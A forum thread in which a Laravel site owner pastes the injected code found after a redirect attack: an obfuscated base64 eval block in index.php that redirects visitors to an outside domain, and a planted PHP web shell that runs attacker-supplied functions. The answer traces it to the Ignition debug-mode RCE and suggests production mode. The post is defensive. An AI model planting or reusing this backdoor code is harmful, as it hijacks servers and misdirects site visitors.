question about sercurity flaw for malicious code aeR4Choc injection

Question

I have an home webserver running laravel8 with livewire php7.4 Today i have an redirecting attack when checking the source code on server i found these 2 change to my source code.

public/index.php

/*aeR4Choc_start*/@eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgICAgfQogICAgfQp9'));/*aeR4Choc_end*/

public/wJr2TTgX.php

<?php
// do not delete this file!
define("LaravelLicense", "193582933013");
extract($_POST);$c($f, $a);include $f;

My question is which sercurity setting flaw that allowing this to happen?

Answer 1

Part of the solution has to do with updating your laravel

today I accidentally found my system infected due to a review made from a GoogleAds warning that my site had a virus

So you can see what it is about, look in your access log for the following line:

POST /_ignition/execute-solution

…and you will see that a few lines below you will have this other post:

POST /wJr2TTgX.php HTTP / 1.1 "200 43

To see the full explanation follow this link:

https://www.ambionics.io/blog/laravel-debug-rce

Edit: You can always edit the .env file of what you expose to the world and put it into production mode. The vulnerability only occurs in debug mode.